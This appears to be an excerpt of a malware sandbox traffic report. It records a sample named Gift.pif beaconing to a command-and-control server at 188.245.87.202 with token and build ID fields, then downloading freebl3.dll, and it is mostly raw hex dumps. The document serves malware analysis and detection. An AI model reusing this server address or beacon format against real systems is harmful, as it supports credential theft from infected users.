                                                                        2024-08-05 16:56:00 UTC16384INData Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8
                                                                        Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                        2024-08-05 16:56:00 UTC16384INData Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24
                                                                        Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$
                                                                        2024-08-05 16:56:00 UTC16384INData Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b
                                                                        Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                        2024-08-05 16:56:00 UTC16384INData Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                        Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                        2024-08-05 16:56:00 UTC16384INData Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                        Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                        2024-08-05 16:56:00 UTC16384INData Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
                                                                        Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                        2024-08-05 16:56:00 UTC16384INData Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
                                                                        Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                        2024-08-05 16:56:01 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
                                                                        Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549721188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:03 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 829
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:03 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHIEBKKFHIEGCAKECGHJCont
                                                                        2024-08-05 16:56:04 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:04 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549722188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:04 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 437
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:04 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------HJJEHJJKJEGHJJKEBFBGCont
                                                                        2024-08-05 16:56:05 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549723188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:05 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 437
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:05 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------AFHDGDGIIDGCFIDHDHDHCont
                                                                        2024-08-05 16:56:06 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549724188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:07 UTC244OUTGET /freebl3.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:07 UTC260INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:07 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 685392
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:07 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:07 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3
                                                                        Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90
                                                                        Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f
                                                                        Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89
                                                                        Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00
                                                                        Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7
                                                                        Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
